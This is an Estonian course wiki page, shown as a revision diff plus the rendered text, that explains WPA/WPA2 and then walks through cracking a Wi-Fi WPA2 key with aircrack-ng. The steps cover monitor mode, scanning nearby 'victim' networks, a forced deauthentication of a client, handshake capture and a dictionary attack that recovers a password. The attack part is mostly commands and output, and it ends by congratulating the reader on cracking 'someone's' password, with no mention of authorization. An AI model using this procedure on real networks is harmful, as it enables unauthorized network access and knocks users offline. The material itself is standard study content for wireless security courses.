WPA kräkkimine: Difference between revisions

From ICO wiki
Jump to navigationJump to search
No edit summary
No edit summary
Line 11: Line 11:
== Kuidas kräkkida WPA'd lahti?<br>  ==
== Kuidas kräkkida WPA'd lahti?<br>  ==


==== Punkt 1. Hetkeseisu tuvastamine ====<br>  
=== Punkt 1. Hetkeseisu tuvastamine===
Käivita '''airmong-ng''', et vaadata millised on sobivad airmong-ng'ga ühilduvad wifi-kaardid. See tagastab hetkeseisu.<br>  
 
<br> Käivita '''airmong-ng''', et vaadata millised on sobivad airmong-ng'ga ühilduvad wifi-kaardid. See tagastab hetkeseisu.<br>  


*'''airmon-ng'''<br>
*'''airmon-ng'''<br>
Line 18: Line 19:
''Interface Chipset Driver''  
''Interface Chipset Driver''  


''wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]''<br>
''wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]''  
===Punkt 2. Monitooringu interface'i loomine ===<br>
 
=== <br> Punkt 2. Monitooringu interface'i loomine.<br>  ===


*'''airmon-ng start wlan0 '''--&gt;väljund:'''<br>'''
*'''airmon-ng start wlan0 '''--&gt;väljund:'''<br>'''
Line 25: Line 27:
''Interface Chipset Driver''  
''Interface Chipset Driver''  


''wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]<br> (monitor mode enabled on mon0)''<br>
''wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]<br> (monitor mode enabled on mon0)''  


===Punkt 3. Potensiaalsete ohvrite otsimine:===<br>
=== Punkt 3. Potensiaalsete ohvrite otsimine:<br>  ===


*'''airodump-ng mon0''' --&gt; väljund:
*'''airodump-ng mon0''' --&gt; väljund:
Line 33: Line 35:
''CH 1 ][ BAT: 1 hour 30 mins ][ Elapsed: 4 s ][ 2012-11-13 15:18 <br> BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID <br> 00:24:17:6A:99:95 -31 14 1 0 11 54 WPA2 CCMP PSK SeeEiOleWIFI <br> 20:C9:D0:19:B1:61 -70 10 0 0 2 54e. WPA2 CCMP PSK MacBook Pro's Wi-Fi Network <br> 64:70:02:68:BC:72 -74 13 0 0 1 54e. WPA2 CCMP PSK Data <br> BSSID STATION PWR Rate Lost Frames Probe ''<br>  
''CH 1 ][ BAT: 1 hour 30 mins ][ Elapsed: 4 s ][ 2012-11-13 15:18 <br> BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID <br> 00:24:17:6A:99:95 -31 14 1 0 11 54 WPA2 CCMP PSK SeeEiOleWIFI <br> 20:C9:D0:19:B1:61 -70 10 0 0 2 54e. WPA2 CCMP PSK MacBook Pro's Wi-Fi Network <br> 64:70:02:68:BC:72 -74 13 0 0 1 54e. WPA2 CCMP PSK Data <br> BSSID STATION PWR Rate Lost Frames Probe ''<br>  


Punkt 4. Ootame ja loodame, et tekib 4way-handshake.<br>  
=== Punkt 4. Ootame ja loodame, et tekib 4way-handshake.<br> ===


*'''airodump-ng -c 11 --bssid 00:24:17:6A:99:95 wlan0'''
*'''airodump-ng -c 11 --bssid 00:24:17:6A:99:95 wlan0'''
Line 43: Line 45:
''15:37:25 Waiting for beacon frame (BSSID: 00:24:17:6A:99:95) on channel 11<br> 15:37:26 Sending 64 directed DeAuth. STMAC: [94:44:44:0E:5A:E1] [25|62 ACKs]''<br>  
''15:37:25 Waiting for beacon frame (BSSID: 00:24:17:6A:99:95) on channel 11<br> 15:37:26 Sending 64 directed DeAuth. STMAC: [94:44:44:0E:5A:E1] [25|62 ACKs]''<br>  


5. Kräkkimise osa!<br>  
=== Punkt 5. Kräkkimise osa!<br> ===


5.1 Katse lühikese sõnastikuga:<br>  
==== 5.1 Katse lühikese sõnastikuga:<br> ====


*'''aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap '''--&gt; väljund:'''<br>'''
*'''aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap '''--&gt; väljund:'''<br>'''
Line 61: Line 63:
'''Järeldus: Paroolide fail liiga lühike ja ei sisalda vajalikku parooli!'''<br>  
'''Järeldus: Paroolide fail liiga lühike ja ei sisalda vajalikku parooli!'''<br>  


5.2 Juhul kui punkt 5.1 toimis ja väljund oli olemas:<br>  
==== 5.2 Juhul kui punkt 5.1 toimis ja väljund oli olemas:<br> ====


Parool oli hoidlas olemas:<br> root@bt:~# aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap
Parool oli hoidlas olemas:<br> root@bt:~# aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap <br>Opening psk-01.cap<br>Opening psk-02.cap<br>Reading packets, please wait...  
<br>Opening psk-01.cap<br>Opening psk-02.cap<br>Reading packets, please wait...  


Aircrack-ng 1.1 r2178<br> [00:00:00] 233 keys tested (1474.16 k/s)<br> KEY FOUND! [ hackit123 ]<br> Master Key&nbsp;: 52 06 5C A9 B9 79 95 44 62 0B E7 66 2D 62 64 7B <br> 35 D3 A5 06 61 D7 23 71 5C 23 20 C6 64 E8 A6 C9  
Aircrack-ng 1.1 r2178<br> [00:00:00] 233 keys tested (1474.16 k/s)<br> KEY FOUND! ['''hackit123''' ]<br> Master Key&nbsp;: 52 06 5C A9 B9 79 95 44 62 0B E7 66 2D 62 64 7B <br> 35 D3 A5 06 61 D7 23 71 5C 23 20 C6 64 E8 A6 C9  


Transient Key&nbsp;: 49 B3 7A 6A B0 96 64 19 D2 97 46 03 50 72 68 4F <br> EF F2 D6 21 C0 AB A8 1B 49 43 9E 21 96 E3 76 9C <br> 87 25 79 1D 35 B1 75 E6 C6 44 0D 5B 9D 18 69 9F <br> 32 1D 67 EB DB 48 50 99 00 AB 22 F7 82 22 54 77  
Transient Key&nbsp;: 49 B3 7A 6A B0 96 64 19 D2 97 46 03 50 72 68 4F <br> EF F2 D6 21 C0 AB A8 1B 49 43 9E 21 96 E3 76 9C <br> 87 25 79 1D 35 B1 75 E6 C6 44 0D 5B 9D 18 69 9F <br> 32 1D 67 EB DB 48 50 99 00 AB 22 F7 82 22 54 77  


EAPOL HMAC&nbsp;: 80 89 8F 6F 3A 28 14 48 1A 7B 13 B3 0E 3F 30 E4 <br>
EAPOL HMAC&nbsp;: 80 89 8F 6F 3A 28 14 48 1A 7B 13 B3 0E 3F 30 E4<br>  
PS! Kui parooli sõnaraamatus ei olnud, siis tuleks hankida kuskilt suurem või genereerida johntheripper-ga, suurte sõnaraamatute tekitamine võtab kaua aega ning nende läbi proovimine omakorda väga kaua aega, kõik sõltub arvuti protsessori kiirusest.<br>
 


<br>


Palju õnne! Oled suutnud lahti kräkkida kellegi WIFI parooli. Troubleshootide juhendid leiad aadressil [http://www.aircrack-ng.org/doku.php?id=cracking_wpa http://www.aircrack-ng.org/doku.php?id=cracking_wpa]<br>  
Palju õnne! Oled suutnud lahti kräkkida kellegi WIFI parooli. Troubleshootide juhendid leiad aadressil [http://www.aircrack-ng.org/doku.php?id=cracking_wpa http://www.aircrack-ng.org/doku.php?id=cracking_wpa]<br>  
PS! Kui parooli sõnaraamatus ei olnud, siis tuleks hankida kuskilt suurem või genereerida johntheripper-ga, suurte sõnaraamatute tekitamine võtab kaua aega ning nende läbi proovimine omakorda väga kaua aega, kõik sõltub arvuti protsessori kiirusest.


Kasutatud materjalid:<br>  
Kasutatud materjalid:<br>  


[[Www.vallaste.ee|www.vallaste.ee]]  
[[www.vallaste.ee|www.vallaste.ee]]<br> [[www.aircrack-ng.org|http://www.aircrack-ng.org/doku.php?id=cracking_wpa ]]<br> [[www.petenetlive.com|http://www.petenetlive.com/KB/Article/0000633.htm ]]<br>
 
[http://www.aircrack-ng.org/doku.php?id=cracking_wpa http://www.aircrack-ng.org/doku.php?id=cracking_wpa]<br>  
[[http://www.petenetlive.com/KB/Article/0000633.htm]]  
 


Autor: Gertti-Vena Rätsep  
'''<br> Autor: Gertti-Vena Rätsep'''


<br>  
<br>  


[[Category:Traadita_side_alused]]
[[Category:Traadita_side_alused]]

Revision as of 22:54, 13 November 2012

Mis on WPA ja WPA2?

WPA (Wi-Fi Protected Access)- Andmeturbe protokoll Wi-Fi alliansilt IEEE 802.11 standardile vastavatele raadiokohtvõrkudele (Wi-Fi võrkudele). Siin kasutatakse TKIP (Temporal Key Integrity Protocol) protokolli, et tagada tugevamat krüpteerimist kui varasema WEP protokolli puhul (WEP kasutas RC4 algoritmi, kuid WPA kasutab AES algoritmi). WPA on tuletatud IEEE 802.11i andmeturbe standardist ning kasutab autentimiseks EAP protokolli.

WPA2 (Wireless Protected Access 2) - Traadita kohtvõrgu standardile IEEE 802.11i vastav andmeturbeprotokoll aastast 2004. On turvalisem kui vahepeal kasutatud WPA protokoll, sest kasutab krüpteerimiseks TKIP asemel märksa turvalisemat AES-põhist CCMP algoritmi. Alates 2006.a. peavad kõik Wi-Fi logoga varustatud seadmed toetama WPA2 andmeturvet.

Mis on WIFI?

Wi-Fi, WiFi (Wireless Fidelity) - Raadiokohtvõrk, raadio-Ethernet Wi-Fi on WECA (Wireless Ethernet Compatibility Alliance) poolt propageeritav kaubamärk, mis vastab raadiokohtvõrgu (WLAN) standardile IEEE 802.11. Tegemist on Etherneti protokolli kasutava kohtvõrguga, kus kaablid on asendatud raadiolinkidega. WiFi on ühilduv PC-kaartidega ja WiFi logot kandvate tugijaamadega Vahel kutsutakse raadiokohtvõrke ka "traadita Internetiks", kuigi tegelikult on ikkagi tegemist traadita kohtvõrkudega, mis võivad muidugi olla ühendatud ka Internetiga.

Kuidas kräkkida WPA'd lahti?

Punkt 1. Hetkeseisu tuvastamine.


Käivita airmong-ng, et vaadata millised on sobivad airmong-ng'ga ühilduvad wifi-kaardid. See tagastab hetkeseisu.

  • airmon-ng

Interface Chipset Driver

wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]


Punkt 2. Monitooringu interface'i loomine.

  • airmon-ng start wlan0 -->väljund:

Interface Chipset Driver

wlan0 Intel 1000REV=0x6C iwlwifi - [phy0]
(monitor mode enabled on mon0)

Punkt 3. Potensiaalsete ohvrite otsimine:

  • airodump-ng mon0 --> väljund:

CH 1 ][ BAT: 1 hour 30 mins ][ Elapsed: 4 s ][ 2012-11-13 15:18
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:24:17:6A:99:95 -31 14 1 0 11 54 WPA2 CCMP PSK SeeEiOleWIFI
20:C9:D0:19:B1:61 -70 10 0 0 2 54e. WPA2 CCMP PSK MacBook Pro's Wi-Fi Network
64:70:02:68:BC:72 -74 13 0 0 1 54e. WPA2 CCMP PSK Data
BSSID STATION PWR Rate Lost Frames Probe

Punkt 4. Ootame ja loodame, et tekib 4way-handshake.

  • airodump-ng -c 11 --bssid 00:24:17:6A:99:95 wlan0

Kui ei teki handshake, siis tuleb see sundida. Klient tuleb sundida AP küljest lahti, et tekiks uus handshake.

  • aireplay-ng -0 1 -a 00:24:17:6A:99:95 -c 94:44:44:0E:5A:E1 mon0 --> väljund:

15:37:25 Waiting for beacon frame (BSSID: 00:24:17:6A:99:95) on channel 11
15:37:26 Sending 64 directed DeAuth. STMAC: [94:44:44:0E:5A:E1] [25|62 ACKs]

Punkt 5. Kräkkimise osa!

5.1 Katse lühikese sõnastikuga:

  • aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap --> väljund:

Opening psk-01.cap
Opening psk-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r2178
[00:00:00] 233 keys tested (1532.68 k/s)
Current passphrase: valhalla
Master Key : B4 D8 F9 A1 70 C9 E2 3D 9C 82 7D 39 25 48 14 96
D6 DC 22 13 34 D1 05 1A EC 67 BD 5F 27 01 9C 7D

Transient Key : 83 CD 49 50 8F 52 1A 92 91 79 39 8C CD FC E8 6A
57 73 4A 7E CE 15 F3 BD 74 AF 2C B8 23 D1 6C 45
90 78 BA 33 94 B1 52 7B ED 69 88 74 41 0B E9 62
A4 22 A2 53 97 5C 5B 32 B8 21 50 C4 21 34 01 D9

EAPOL HMAC : 40 7B 06 6B C6 87 27 FB F2 FF 2B 9C A7 85 54 19

Passphrase not in dictionary

Järeldus: Paroolide fail liiga lühike ja ei sisalda vajalikku parooli!

5.2 Juhul kui punkt 5.1 toimis ja väljund oli olemas:

Parool oli hoidlas olemas:
root@bt:~# aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst -b 00:24:17:6A:99:95 psk-0*cap
Opening psk-01.cap
Opening psk-02.cap
Reading packets, please wait...

Aircrack-ng 1.1 r2178
[00:00:00] 233 keys tested (1474.16 k/s)
KEY FOUND! [hackit123 ]
Master Key : 52 06 5C A9 B9 79 95 44 62 0B E7 66 2D 62 64 7B
35 D3 A5 06 61 D7 23 71 5C 23 20 C6 64 E8 A6 C9

Transient Key : 49 B3 7A 6A B0 96 64 19 D2 97 46 03 50 72 68 4F
EF F2 D6 21 C0 AB A8 1B 49 43 9E 21 96 E3 76 9C
87 25 79 1D 35 B1 75 E6 C6 44 0D 5B 9D 18 69 9F
32 1D 67 EB DB 48 50 99 00 AB 22 F7 82 22 54 77

EAPOL HMAC : 80 89 8F 6F 3A 28 14 48 1A 7B 13 B3 0E 3F 30 E4


Palju õnne! Oled suutnud lahti kräkkida kellegi WIFI parooli. Troubleshootide juhendid leiad aadressil http://www.aircrack-ng.org/doku.php?id=cracking_wpa

PS! Kui parooli sõnaraamatus ei olnud, siis tuleks hankida kuskilt suurem või genereerida johntheripper-ga, suurte sõnaraamatute tekitamine võtab kaua aega ning nende läbi proovimine omakorda väga kaua aega, kõik sõltub arvuti protsessori kiirusest.

Kasutatud materjalid:

www.vallaste.ee
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
http://www.petenetlive.com/KB/Article/0000633.htm


Autor: Gertti-Vena Rätsep


Retrieved from "https://wiki.itcollege.ee/index.php?title=WPA_kräkkimine&oldid=57024"